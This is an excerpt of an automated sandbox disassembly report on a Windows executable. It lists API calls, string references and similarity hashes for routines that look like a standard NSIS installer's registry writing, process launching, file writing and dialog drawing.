• SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
• LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
• SetCursor.USER32(00000000), ref: 004042D2
• ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
• LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
• SetCursor.USER32(00000000), ref: 004042F6
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
• String ID: @%F$N$open
• API String ID: 3928313111-3849437375
• Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
• Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
• Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
• Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
APIs
• lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
• CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
• GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
• GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
• WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
• WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
• wsprintfA.USER32 ref: 00406B4D
• GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
• WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
• GlobalFree.KERNEL32(00000000), ref: 00406C52
• CloseHandle.KERNEL32(?), ref: 00406C5C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
• String ID: F$%s=%s$NUL$[Rename]
• API String ID: 565278875-1653569448
• Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
• Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
• Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
• Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010D8
• FillRect.USER32(00000000,?,00000000), ref: 004010ED
• DeleteObject.GDI32(?), ref: 004010F6
• CreateFontIndirectW.GDI32(?), ref: 0040110E
• SetBkMode.GDI32(00000000,00000001), ref: 0040112F
• SetTextColor.GDI32(00000000,000000FF), ref: 00401139
• SelectObject.GDI32(00000000,?), ref: 00401149
• DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
• SelectObject.GDI32(00000000,00000000), ref: 00401169
• DeleteObject.GDI32(?), ref: 0040116E
• EndPaint.USER32(?,?), ref: 00401177
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
• Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
• Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
• Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
APIs
• RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
• lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
• RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
• RegCloseKey.ADVAPI32(?), ref: 004029E4
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
Strings
• WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
• WriteReg: error creating key "%s\%s", xrefs: 004029F5
• WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
• WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
• WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
• WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                          • API String ID: 1641139501-220328614
                                                                                                          • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                          • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                                          • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                          • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                          Strings
                                                                                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                          • String ID: created uninstaller: %d, "%s"
                                                                                                          • API String ID: 3294113728-3145124454
                                                                                                          • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                          • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                                          • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                          • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                                          APIs
                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                          • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                          • API String ID: 3734993849-2769509956
                                                                                                          • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                          • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                          • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                          • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                          APIs
                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                          • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                          • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                          • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2320649405-0
                                                                                                          • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                          • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                          • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                          • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                          Strings
                                                                                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                          • API String ID: 1033533793-945480824
                                                                                                          • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                          • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                          • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                          • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                          APIs
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                            • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                            • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                          Strings
                                                                                                          • Exec: success ("%s"), xrefs: 00402263
                                                                                                          • Exec: command="%s", xrefs: 00402241
                                                                                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                          • API String ID: 2014279497-3433828417
                                                                                                          • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                          • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                          • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                          • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                          • GetMessagePos.USER32 ref: 00404871
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                          • String ID: f
                                                                                                          • API String ID: 41195575-1993550816
                                                                                                          • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                          • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                          • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                          • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                          APIs
                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                          • MulDiv.KERNEL32(0002BE00,00000064,?), ref: 00403295
                                                                                                          • wsprintfW.USER32 ref: 004032A5
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                          Strings
                                                                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                          • String ID: verifying installer: %d%%
                                                                                                          • API String ID: 1451636040-82062127
                                                                                                          • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                          • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                          • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                          • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                          • wsprintfW.USER32 ref: 00404457
                                                                                                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                          • String ID: %u.%u%s%s$@rD
                                                                                                          • API String ID: 3540041739-1813061909
                                                                                                          • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                          • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                          • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                          • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                          APIs
                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
